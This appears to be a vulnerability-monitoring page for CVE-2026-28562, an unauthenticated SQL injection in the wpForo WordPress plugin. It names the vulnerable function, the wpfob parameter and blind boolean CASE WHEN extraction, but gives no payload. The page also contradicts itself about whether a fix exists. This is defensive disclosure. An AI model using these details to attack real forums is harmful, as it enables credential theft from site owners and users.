Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
8.8
wpForo: Unauthenticated SQL Injection via Unquoted Identifiers
CVE-2026-28562
Summary
The wpForo plugin for WordPress has a security issue that allows hackers to access sensitive information from your database without needing a password. This is because the plugin doesn't properly protect certain database queries. To fix this, update the plugin to the latest version.
What to do
No fix is available yet. Check with your software vendor for updates.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| gvectors | wpforo_forum | > 2.4.0 , <= 2.4.15 | – |
Original title
wpForo 2.4.14 contains an unauthenticated SQL injection vulnerability in Topics::get_topics() where the ORDER BY clause relies on ineffective esc_sql() sanitization on unquoted identifiers. Attacke...
Original description
wpForo 2.4.14 contains an unauthenticated SQL injection vulnerability in Topics::get_topics() where the ORDER BY clause relies on ineffective esc_sql() sanitization on unquoted identifiers. Attackers exploit the wpfob parameter with CASE WHEN payloads to perform blind boolean extraction of credentials from the WordPress database.
nvd CVSS3.1
9.8
nvd CVSS4.0
8.8
Vulnerability type
CWE-89
SQL Injection
- https://wordpress.org/plugins/wpforo/ Product
- https://wordpress.org/plugins/wpforo/#developers Release Notes
- https://www.vulncheck.com/advisories/wpforo-sql-injection-via-topics-order-by-pa... Third Party Advisory
Published: 28 Feb 2026 · Updated: 13 Mar 2026 · First seen: 6 Mar 2026